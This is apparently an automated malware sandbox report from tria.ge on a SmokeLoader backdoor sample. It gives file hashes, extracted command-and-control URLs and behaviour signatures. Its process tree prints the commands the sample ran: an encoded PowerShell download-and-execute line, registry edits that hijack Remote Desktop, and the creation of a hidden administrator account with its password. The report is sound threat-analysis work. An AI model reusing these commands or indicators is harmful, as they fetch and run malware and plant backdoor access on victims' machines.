Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

580fc5cd72...d0.exe

windows7_x64

10

580fc5cd72...d0.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    18/10/2021, 12:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    580fc5cd72d7979040fa1c4866ada3d0.exe

  • Size

    343KB

  • MD5

    580fc5cd72d7979040fa1c4866ada3d0

  • SHA1

    7da202d99be94f57f355c611bafde9656bca65b7

  • SHA256

    42e7ef551c652a5e6f0ff919fcb53cd2c34682006cb1436295205a41abec6589

  • SHA512

    b1be0be516e0d36c4b2e2f9e82e5cd94fecc86c39a4eee4494174f55e319a4c72d529e2aa097d3d466c5613df4106624fd689e6a1441e6be4a7bf9a15dc44815

Score
10/10
smokeloaderbackdoorpersistencetrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/
rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\580fc5cd72d7979040fa1c4866ada3d0.exe
    "C:\Users\Admin\AppData\Local\Temp\580fc5cd72d7979040fa1c4866ada3d0.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4088
  • C:\Users\Admin\AppData\Local\Temp\2F69.exe
    C:\Users\Admin\AppData\Local\Temp\2F69.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4232
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4432
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hh25b14x\hh25b14x.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1168
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES461D.tmp" "c:\Users\Admin\AppData\Local\Temp\hh25b14x\CSCDD0732B8F6904A22B1D567148B4DB08E.TMP"
          4⤵
            PID:1256
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1784
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4860
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4920
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:1048
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:1100
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:3464
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2108
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2224
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1700
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2948
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4492
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:3160
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3608
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3192
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2404
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:3052
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:2728
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2908
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:5008
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5056
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:3828
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc agVLh50q /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3116
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc agVLh50q /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3564
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc agVLh50q /add
                          3⤵
                            PID:3664
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3020
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4080
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:3936
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4404
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4164
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
                              3⤵
                                PID:856
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:356
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1232
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:1392
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc agVLh50q
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1212
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc agVLh50q
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1584
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc agVLh50q
                                  3⤵
                                    PID:1668
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                  PID:2164
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic path win32_VideoController get name
                                    2⤵
                                      PID:4132
                                  • C:\Windows\System32\cmd.exe
                                    cmd.exe /C wmic CPU get NAME
                                    1⤵
                                      PID:3832
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic CPU get NAME
                                        2⤵
                                          PID:824
                                      • C:\Windows\System32\cmd.exe
                                        cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                        1⤵
                                          PID:1772
                                          • C:\Windows\system32\cmd.exe
                                            cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                            2⤵
                                              PID:4812
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                3⤵
                                                • Blocklisted process makes network request
                                                • Drops file in Program Files directory
                                                • Drops file in Windows directory
                                                • Modifies data under HKEY_USERS
                                                PID:1624

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • memory/1624-401-0x000001C6FC088000-0x000001C6FC089000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/1624-400-0x000001C6FC086000-0x000001C6FC088000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1624-388-0x000001C6FC080000-0x000001C6FC082000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1624-389-0x000001C6FC083000-0x000001C6FC085000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-202-0x00000240B4016000-0x00000240B4018000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-168-0x00000240B2370000-0x00000240B2372000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-176-0x00000240B2370000-0x00000240B2372000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-174-0x00000240B4013000-0x00000240B4015000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-173-0x00000240B4010000-0x00000240B4012000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-178-0x00000240B2370000-0x00000240B2372000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-171-0x00000240B2370000-0x00000240B2372000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-210-0x00000240B4018000-0x00000240B401A000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-170-0x00000240B2370000-0x00000240B2372000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-177-0x00000240B2370000-0x00000240B2372000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-180-0x00000240B2370000-0x00000240B2372000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1784-169-0x00000240B2370000-0x00000240B2372000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/3028-118-0x0000000000850000-0x0000000000866000-memory.dmp

                                            Filesize

                                            88KB

                                            Download

                                          • memory/4088-115-0x0000000000A56000-0x0000000000A66000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/4088-117-0x0000000000400000-0x0000000000788000-memory.dmp

                                            Filesize

                                            3.5MB

                                            Download

                                          • memory/4088-116-0x0000000000790000-0x000000000083E000-memory.dmp

                                            Filesize

                                            696KB

                                            Download

                                          • memory/4232-127-0x0000023054046000-0x0000023054047000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4232-126-0x0000023054045000-0x0000023054046000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4232-124-0x0000023054040000-0x0000023054042000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4232-125-0x0000023054043000-0x0000023054045000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4232-122-0x000002306E4E0000-0x000002306E8DF000-memory.dmp

                                            Filesize

                                            4.0MB

                                            Download

                                          • memory/4432-131-0x00000221E64C0000-0x00000221E64C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-139-0x00000221E8AC0000-0x00000221E8AC1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4432-136-0x00000221E64C0000-0x00000221E64C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-137-0x00000221E64C0000-0x00000221E64C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-135-0x00000221E66F3000-0x00000221E66F5000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-138-0x00000221E64C0000-0x00000221E64C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-134-0x00000221E66F0000-0x00000221E66F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-133-0x00000221E83B0000-0x00000221E83B1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4432-160-0x00000221E9360000-0x00000221E9361000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4432-141-0x00000221E64C0000-0x00000221E64C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-148-0x00000221E66F6000-0x00000221E66F8000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-159-0x00000221E8FD0000-0x00000221E8FD1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4432-153-0x00000221E8A70000-0x00000221E8A71000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4432-129-0x00000221E64C0000-0x00000221E64C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-132-0x00000221E64C0000-0x00000221E64C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4432-172-0x00000221E66F8000-0x00000221E66F9000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4432-130-0x00000221E64C0000-0x00000221E64C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4860-246-0x00000251B6096000-0x00000251B6098000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4860-245-0x00000251B6093000-0x00000251B6095000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4860-244-0x00000251B6090000-0x00000251B6092000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4920-285-0x0000014D3FF70000-0x0000014D3FF72000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4920-287-0x0000014D3FF73000-0x0000014D3FF75000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4920-289-0x0000014D3FF76000-0x0000014D3FF78000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4920-298-0x0000014D3FF78000-0x0000014D3FF7A000-memory.dmp

                                            Filesize

                                            8KB

                                            Download